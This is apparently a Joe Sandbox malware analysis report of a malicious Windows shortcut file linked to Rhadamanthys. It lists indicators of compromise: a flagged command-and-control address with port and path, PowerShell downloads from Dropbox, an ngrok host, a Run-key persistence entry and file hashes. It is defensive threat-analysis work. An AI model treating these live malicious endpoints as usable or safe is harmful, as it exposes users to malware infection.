                                                                                                                            https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gekernelbasentdllkernel32GetProcesfontdrvhost.exe, 0000001E.00000003.2468942402.0000000005945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://www.dropbox.com/v/s/playlist/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www-env.dropbox-dns.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trwpowershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://help.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://msn.cn/msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.compowershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzpowershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 162.125.65.15 | unknown | United States | 19679 | DROPBOXUS | false |
| 162.125.69.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false |
| 162.125.69.15 | edge-block-www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false |
| 162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 18.192.31.165 | 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app | United States | 16509 | AMAZON-02US | false |
| 142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 204.79.197.237 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 162.213.210.250 | unknown | United States | 53755 | IOFLOODUS | true |
                                                                                                                                                                                                          IP
                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                          192.168.2.23
                                                                                                                                                                                                          192.168.2.14
                                                                                                                                                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572663
Start date and time: 2024-12-10 18:40:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 751ietQPnX.lnk (renamed because original name is a hash value)
Original Sample Name: da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f.lnk
Detection: MAL
Classification: mal100.troj.evad.winLNK@90/359@21/14
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .lnk
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 192.229.221.95, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.19.238, 13.107.6.158, 2.16.158.72, 2.16.158.83, 2.16.158.75, 2.16.158.80, 2.16.158.81, 2.16.158.82, 2.16.158.90, 2.16.158.59, 2.16.158.74, 104.110.240.232, 104.110.240.201, 199.232.214.172, 172.165.61.93, 23.218.208.109, 104.110.240.224, 104.110.240.219, 13.87.96.169, 20.189.173.20, 2.16.158.97, 2.16.158.96, 2.16.158.176, 2.16.158.91, 2.16.158.170, 2.16.158.169, 142.251.40.99, 142.250.65.195, 142.251.40.227, 52.149.20.212, 20.190.151.9, 13.107.246.63, 13.107.246.40, 4.152.133.8, 4.150.155.223, 142.250.176.202, 40.126.53.13, 23.44.133.31
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, telem-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, fs
                                                                                                                                                                                                          • Execution Graph export aborted for target 854113748.exe, PID 416 because there are no executed function
                                                                                                                                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8100 because there are no executed function
                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7148 because it is empty
                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 8592 because it is empty
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: 751ietQPnX.lnk
| Time | Type | Description |
|---|---|---|
| 12:41:15 | API Interceptor | 199x Sleep call for process: powershell.exe modified |
| 12:41:27 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 12:42:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
| 17:41:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 |
| 17:41:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 |
| 17:42:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe |
| 17:42:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe |
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| 162.125.65.15 | qxjDerXRGR.lnk | malicious | RHADAMANTHYS |
| 162.125.65.15 | pay.bat | malicious | Kimsuky |
| 162.125.65.15 | protected.ps1 | malicious | Unknown |
| 162.125.65.15 | https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloading | malicious | Unknown |
| 162.125.65.15 | 35N4PXWcmC.msi | malicious | Unknown |
| 162.159.61.3 | qxjDerXRGR.lnk | malicious | RHADAMANTHYS |
| 162.159.61.3 | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown |
| 162.159.61.3 | 1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe | malicious | Remcos |
| 162.159.61.3 | https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01 | malicious | Unknown |
| 162.159.61.3 | nanophanotool.exe | malicious | LummaC Stealer |
| 162.159.61.3 | Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml | malicious | Unknown |
| 162.159.61.3 | Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdf | malicious | Unknown |
| 162.159.61.3 | FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msg | malicious | Unknown |
| 162.159.61.3 | SADP.zip | malicious | Unknown |
                                                                                                                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                        162.125.69.18Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                            zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                    7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                      kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                        https://docsend.com/view/nw5cttresp36nsvcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            162.125.69.15qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                    zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            Rechnung-Kfz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              DROPBOXUSqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown
• 162.125.69.15
interior-design-villa-a23.lnk | malicious | MalLnk
• 162.125.69.15
Updates.bat | malicious | Abobus Obfuscator
• 162.125.65.18
zW72x5d91l.bat | malicious | Unknown
• 162.125.69.15
ljshdfglksdfNEW.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.65.18
kjhsdg.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
kjshdf.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
kjsdhfgs.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
DROPBOXUS | qxjDerXRGR.lnk | malicious | RHADAMANTHYS
• 162.125.69.15
taCCGTk8n1.lnk | malicious | RHADAMANTHYS
• 162.125.69.15
Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown
• 162.125.69.15
interior-design-villa-a23.lnk | malicious | MalLnk
• 162.125.69.15
Updates.bat | malicious | Abobus Obfuscator
• 162.125.65.18
zW72x5d91l.bat | malicious | Unknown
• 162.125.69.15
ljshdfglksdfNEW.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.65.18
kjhsdg.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
kjshdf.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
kjsdhfgs.bat | malicious | Abobus Obfuscator, Braodo
• 162.125.69.18
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | qxjDerXRGR.lnk | malicious | RHADAMANTHYS
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
taCCGTk8n1.lnk | malicious | RHADAMANTHYS
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
9coWg6ayLz.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
UFS0yWUTWR.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
xrv3PCeWDV.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
K2B1CPXWSc.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
HwFciuum6M.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
qKIpxnvEyJ.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
3PALEJZmqL.msi | malicious | Unknown
• 162.125.65.15
• 162.125.69.18
• 18.192.31.165
• 162.125.69.15
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe | qxjDerXRGR.lnk | malicious | RHADAMANTHYS
C:\Users\user\AppData\Local\Temp\854113748.exe | qxjDerXRGR.lnk | malicious | RHADAMANTHYS
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3275306050965938
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrD:KooCEYhgYEL0In
                                                                                                                                                                                                                                                                                  MD5:2C8714B0E58093309323D7EC8E2F3F14
                                                                                                                                                                                                                                                                                  SHA1:93A4CB34D613227D77BE9A396AADCD663A5C9CC7
                                                                                                                                                                                                                                                                                  SHA-256:288BBA991F693D7C18437AAE6FA55D1642912A33989E90754A21874484D4D552
                                                                                                                                                                                                                                                                                  SHA-512:36D8A56CA2370BA86C26431F8ED286F6F3789948FDBCF62AB7BB3C205CF938E7BD5B78C32A2A020DBBBD2061A63974D3104C4625A2D49DFB92EF5813DBD7C8DE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x77f787f5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.422176101403095
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                                                  MD5:D37865A7471DC88B9E679189ADF8294A
                                                                                                                                                                                                                                                                                  SHA1:E73CFACB9F7DB2C620807841378CA46241AF40AD
                                                                                                                                                                                                                                                                                  SHA-256:6A9E729162F4F6F1F547BF0CF74F9C69136F54A3A117397EC1C36F3C125A725E
                                                                                                                                                                                                                                                                                  SHA-512:16D932F3E6AAC194F9D93CF0159DA8A007720EA522669AE0E6B5EC76884CED6FED6ADA40B38374B526DFA744859B283961B3DD53430E4F8F218B4CA47854150C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07666993211325662
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NGl/yYeOlpZ0hajn13a/P55zal/ollcVO/lnlZMxZNQl:syzaZ0ha53qLuAOewk
                                                                                                                                                                                                                                                                                  MD5:370B9BC900B3CEF31F8A152250C3F1B4
                                                                                                                                                                                                                                                                                  SHA1:365E1418EF87F3523D4B9C28541ADFBD6CACA1A6
                                                                                                                                                                                                                                                                                  SHA-256:8B26E2D8A692272B5E0D65D5BD7C031AB77D7D1886A07135F6FA87FF16D1494F
                                                                                                                                                                                                                                                                                  SHA-512:FCAC0155A9F8E92EB0E2DBF9A9BE0BCFD1F54E3F58A2432AFF35BDD1562FF74E6585C5C97B155490BC08F189ADEB1D0E106B8060BD91898811E1512106F0D69A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6602034859718899
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:ankFqg3elHqigKJtts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZA7:rQwaHnttxR0apYKjqzuiFcZ24lO8JO
                                                                                                                                                                                                                                                                                  MD5:ED02B9464638F9BDF533AB10246EF2A7
                                                                                                                                                                                                                                                                                  SHA1:1AFA25D81ACB4506939369D539F410BC69AF76A7
                                                                                                                                                                                                                                                                                  SHA-256:331721FB5227360B10B384FF6ACF52FDCC6DB85DBB7739B5CE2092A18C5D1128
                                                                                                                                                                                                                                                                                  SHA-512:F59A890DC8450E6C78E6BDD3A37367F521741515692BE748DCF6CD0E975E9A590E6A14516102847771D2124E4C318B7FCAEBEFB15C77C625BC64F435C9337AB9
                                                                                                                                                                                                                                                                                  Malicious:false
